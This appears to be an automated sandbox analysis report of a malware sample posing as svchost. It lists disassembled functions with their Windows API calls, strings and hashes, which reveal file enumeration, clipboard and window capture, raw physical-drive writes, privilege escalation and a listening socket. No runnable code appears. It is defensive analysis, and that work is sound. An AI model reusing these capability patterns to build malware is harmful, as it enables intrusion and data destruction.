                                                                                                                                                                                                              • Instruction ID: 7adea81ee78407bb94c645ed04f176341f77f3bc8d58301dd5a38257509fe7c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05ad4c67ee511aafc81b7b6f5c37b933caa5d4a974e908ec0d90e59d06eb96bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE51B771E863267AFF315A218C4EFAB3A6CAF41B95F580214BA0DE91C0DBB0D544C6A4
                                                                                                                                                                                                              Function 02C97680 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 215memoryfilestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,02CA3D26,00000000,00000000,74DF2F00), ref: 02C976BB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C976C2
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C976DA
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,02CA3D17,00000104), ref: 02C976E9
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 02C97711
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocFileFindFirstProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              • API String ID: 2617121151-1173974218
                                                                                                                                                                                                              • Opcode ID: dfb81d39b677e52fcb2934c4a77be5acb96878367d8e0e06b1d4d48f75eef648
                                                                                                                                                                                                              • Instruction ID: 09e31594cafd894e913dce42b86e020c0ae2541cf2f4b381e09718f9b07880a4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfb81d39b677e52fcb2934c4a77be5acb96878367d8e0e06b1d4d48f75eef648
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 626147B19163015BCB119F349C8CFB7BFA9AF81394F484644F982D7281E722D50CC790
                                                                                                                                                                                                              Function 02CBDA50 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 297stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$FolderPathSpecialstrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              • API String ID: 2246752426-2295261572
                                                                                                                                                                                                              • Opcode ID: ca308fd5cf1d6b6e4486e96edd9677a7f3185c31b6eb262883185a729a3df69c
                                                                                                                                                                                                              • Instruction ID: fd6bf843f6c3a125ab9dc8e27b2429c16a6439fa0c1a96f994f3e9f580482034
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca308fd5cf1d6b6e4486e96edd9677a7f3185c31b6eb262883185a729a3df69c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92A14971A002199FEF26CB24DC55FEB7775EF86310F1446E4EA4A9B180DB70AB45CBA0
                                                                                                                                                                                                              Function 02CA3220 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 173memorythreadclipboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 02CA325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02CA327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 02CA3286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 02CA329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 02CA32AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02CA32D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02CA32FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA3301
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA3311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02CA332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 02CA3399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,00000000,00000001), ref: 02CA33DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3472172748-4108050209
                                                                                                                                                                                                              • Opcode ID: dc9ad1667656681f92a039be36cf0fa7c74e7adaba061f67fceb43732304f31c
                                                                                                                                                                                                              • Instruction ID: ca0604a3420b51d7d383cc2013a2dfb0b98e0f7a22f3e367d81b1054bc7bb8b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc9ad1667656681f92a039be36cf0fa7c74e7adaba061f67fceb43732304f31c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C51573164A343ABD7209F649C7CF2B7B98EFC6759F000748F949D7280DB61DA0987A1
                                                                                                                                                                                                              Function 02CA1900 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 121memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(\iexplore.exe), ref: 02CA190E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 02CA1915
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA1990
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA1999
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,74DEF550,74DF1620,80000002), ref: 02CA19E3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA19E6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA19F3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA19F6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA1A06
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA1A20
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA1A4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA1A52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA1A5F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA1A62
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatestrstr$AdminCommandLineUsermemset
                                                                                                                                                                                                              • String ID: \iexplore.exe$set_url
                                                                                                                                                                                                              • API String ID: 2523706361-3242205626
                                                                                                                                                                                                              • Opcode ID: 866e776bf3f34b54e5cc5997817937b6fb71717268d0c28e1527dc324c0e1f3e
                                                                                                                                                                                                              • Instruction ID: 6d62c2205f057252374661cb3d300455f880ecb5b7d0ac5de0d52f16b558662b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 866e776bf3f34b54e5cc5997817937b6fb71717268d0c28e1527dc324c0e1f3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A31E935E8236267E7212A745C19B5F364CAF40B99F4D0628ED4EEB241E7E4DD00C6E1
                                                                                                                                                                                                              Function 02CB9910 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 178filememoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,74DF2F00), ref: 02CB9991
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB99AD
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 02CB99BC
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 02CB99C9
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CB9A08
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CB9A16
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 02CB9B0D
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 02CB9B1C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                              • API String ID: 2477558990-1591360731
                                                                                                                                                                                                              • Opcode ID: 5b91a3062f8ed53cd817fb75f68ad940e0bf4aab374b72ca655e84b854bb4eca
                                                                                                                                                                                                              • Instruction ID: adeee4cfede36b16d6c9894b0a5f883cf3d48c50aef339186a8cb2d4e52d535d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b91a3062f8ed53cd817fb75f68ad940e0bf4aab374b72ca655e84b854bb4eca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B05181B19443419BD322DF14C884FABBBE9EFC9704F144A09FA8597241D7749A08CFA2
                                                                                                                                                                                                              Function 02C92BA0 Relevance: 21.5, APIs: 14, Instructions: 466COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocfree$exit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 337157181-0
                                                                                                                                                                                                              • Opcode ID: 6e36c8e1708557b23f4b046d440ca67d37a40eaf0e0ef6e12d523feeec76c736
                                                                                                                                                                                                              • Instruction ID: 237dc5d7a6bd31b633623e7c8ee67bcbc33346c266e103caf1534a987ce07bc7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e36c8e1708557b23f4b046d440ca67d37a40eaf0e0ef6e12d523feeec76c736
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7F1C1B1A00209ABDF20CF58D888BAEB7B5FF88714F144569ED45A7340D771EE51CBA2
                                                                                                                                                                                                              Function 02CA33F0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 104fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA3411
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(02CEDDB4,?,?,?), ref: 02CA3428
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(02CEDDB4,?,?,?), ref: 02CA3438
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CA3465
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02CA3487
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,74DE9300), ref: 02CA34B1
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02CA34C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02CA34D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02CA34EA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02CA3655), ref: 02CA3507
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA3518
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
                                                                                                                                                                                                              • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                              • API String ID: 649538874-3292898883
                                                                                                                                                                                                              • Opcode ID: e1a898401face07a1bacdcb4ea25fd137afd6e975340a97d268267fb0e6d3fde
                                                                                                                                                                                                              • Instruction ID: 4ffcb473597bf6e3485872a117efbc7bd25b4823e9cb7f57a4b71d3c9a2d65ff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1a898401face07a1bacdcb4ea25fd137afd6e975340a97d268267fb0e6d3fde
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41313271A82314BBE720AB59DC19FEE77AC9F41B18F404684F644AA0C0C7F05B848BE4
                                                                                                                                                                                                              Function 02CBDAE8 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 135filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 02CBDB7A
                                                                                                                                                                                                              • strchr.MSVCRT ref: 02CBDB89
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 02CBDC75
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 02CBDC89
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              • API String ID: 23527507-2295261572
                                                                                                                                                                                                              • Opcode ID: f4e72859521b0e19e18ea13b06c21f67ddfd05687a4a6b8b82c64cbe157a614d
                                                                                                                                                                                                              • Instruction ID: 67fc91f29415235b94a580fdb7a157158f9b41495979fdb0e11eb38c6e34c63e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4e72859521b0e19e18ea13b06c21f67ddfd05687a4a6b8b82c64cbe157a614d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC418A319002599FEF268B24CC54BFAB7A1EF82305F1442E4DA8B97180D770AB45CF51
                                                                                                                                                                                                              Function 02C9D970 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                              • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                              • API String ID: 776485234-1938657081
                                                                                                                                                                                                              • Opcode ID: 25ebcf98eca8f5be7aa9a842142bbfda73f58eedbfd3b33b9321df6f9c490eb9
                                                                                                                                                                                                              • Instruction ID: efd378ec2a5632892982f913e12adef7f8895fbf47b2a3f2f98b32b31a018930
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25ebcf98eca8f5be7aa9a842142bbfda73f58eedbfd3b33b9321df6f9c490eb9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A01497268121839F2307E949C4BD77775CEF856A5741037DFA8796440F9906D00CAB1
                                                                                                                                                                                                              Function 00401E00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 731831024-2333288578
                                                                                                                                                                                                              • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                              Function 02CC1250 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02CC1278
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 02CC128E
                                                                                                                                                                                                              • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 02CC12A8
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 02CC12B3
                                                                                                                                                                                                              • bind.WS2_32(00000000,?,00000010), ref: 02CC12CB
                                                                                                                                                                                                              • listen.WS2_32(00000000,00000005), ref: 02CC12D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: bindclosesockethtonslistensetsockoptsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4126956815-0
                                                                                                                                                                                                              • Opcode ID: f1d7b0e919ed8ad8f56fcd6be9470fc44a85341ff0c3cdd9566ca4e7f2ecc3a0
                                                                                                                                                                                                              • Instruction ID: bd67dfc7ecbf18d8a82fe1dbec7ce1e1904fae07f7655fa248300577e47d6be3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1d7b0e919ed8ad8f56fcd6be9470fc44a85341ff0c3cdd9566ca4e7f2ecc3a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D110235B41209ABD7109B69DC09BAF7768AF04751F500359FF00EA2C0E7B09A118BA1
                                                                                                                                                                                                              Function 02CB2B40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB2B5E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02CB2B83
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02CB2B95
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileModuleNamememset
                                                                                                                                                                                                              • String ID: \clmain.exe
                                                                                                                                                                                                              • API String ID: 350293641-582869414
                                                                                                                                                                                                              • Opcode ID: 0057a08b54a0c089f6b5e48c5966b11e484a29ec8d34aa31e852a2b95fdf259f
                                                                                                                                                                                                              • Instruction ID: af8e9c88fb3941ad8d47f18329570230393f4881759f6a7e1e8fb015e6dd8815
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0057a08b54a0c089f6b5e48c5966b11e484a29ec8d34aa31e852a2b95fdf259f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CF0A7B1A952086BDB64DA74DC46FE573A89B18705F4006E5FB8ED50C0E7F016D48B91
                                                                                                                                                                                                              Function 02CBE0FB Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02CBE119
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 02CBE15E
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 02CBE1D2
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 02CBE1FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2496910992-0
                                                                                                                                                                                                              • Opcode ID: d925e5af524726a8346bb09a97afdb471f341cf6dc6b247596c0d32166124c25
                                                                                                                                                                                                              • Instruction ID: a2e7cc0c3ef6a61c12d8c157257cda07bf5a7c56d80be9da53fc28ca1d7e4f5b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d925e5af524726a8346bb09a97afdb471f341cf6dc6b247596c0d32166124c25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D314C7270025E8FDB01CEA8EC847EE7B68EF45351F5406A2E94687201D7318616CBE2
